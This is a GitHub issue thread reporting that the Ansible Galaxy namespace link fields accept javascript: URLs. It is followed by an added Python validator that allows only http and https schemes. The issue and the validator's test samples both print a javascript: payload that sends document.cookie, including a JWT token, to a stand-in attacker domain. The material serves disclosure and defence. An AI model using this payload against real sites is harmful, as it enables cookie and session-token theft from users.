ansible / galaxy-dev

Ansible Automation Hub

Security vulnerability in namespace link fields #258

Closed ironfroggy closed 4 years ago

ironfroggy commented 4 years ago

The namespace edit form allows a number of arbitrary links. The URL field for these links is not properly sanitized in all cases. It allows javascript: schema links, for one example. This could be used to dump all the cookies, including the RH SSH JWT token, to external domains by means like the following:

javascript:document.write('<img src="http://secretdomain.evil/leak.png?payload='+encodeURI(document.cookie)+'"/>')

ironfroggy commented 4 years ago

Note: this affects production today
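
A server-side scheme allowlist for the link URL field described in this issue, as an added example that is not part of the thread or the project's own code. The names `validate_link_url`, `is_safe_link` and `UnsafeLinkError`, the http/https-only policy and the `example.com` hosts are assumptions.

```python
from urllib.parse import urlsplit

# Assumption: namespace links only ever need to point at ordinary web pages.
ALLOWED_SCHEMES = {"http", "https"}


class UnsafeLinkError(ValueError):
    """Raised when a submitted link URL must not be stored or rendered."""


def validate_link_url(raw: str) -> str:
    """Return the URL if it is an absolute http(s) link, else raise."""
    url = raw.strip(" ")
    # Browsers drop tab/CR/LF inside a URL and skip leading control characters,
    # so "java\tscript:" still resolves to javascript:. Reject, do not normalise.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        raise UnsafeLinkError("whitespace or control character in URL")
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError as exc:  # e.g. malformed IPv6 literal
        raise UnsafeLinkError(f"unparseable URL: {exc}") from exc
    # Allowlist, not denylist: data:, vbscript:, relative and scheme-less
    # values fail here together with javascript:.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeLinkError(f"scheme {parts.scheme!r} is not allowed")
    if not host:
        raise UnsafeLinkError("URL has no host")
    return url


def is_safe_link(raw: str) -> bool:
    try:
        validate_link_url(raw)
        return True
    except UnsafeLinkError:
        return False


if __name__ == "__main__":
    samples = [  # constructed inputs, plus the string reported in the issue
        "https://galaxy.example.com/docs",
        "JaVaScRiPt:alert(1)",
        "java\tscript:alert(1)",
        "//cdn.example.com/x",
        """javascript:document.write('<img src="http://secretdomain.evil/leak.png?payload='+encodeURI(document.cookie)+'"/>')""",
    ]
    for s in samples:
        print(f"{is_safe_link(s)!s:5}  {s!r}")
```

Run the same check when the value is saved and again when it is placed into an `href`, since links stored before the check existed are not covered by validation on save alone.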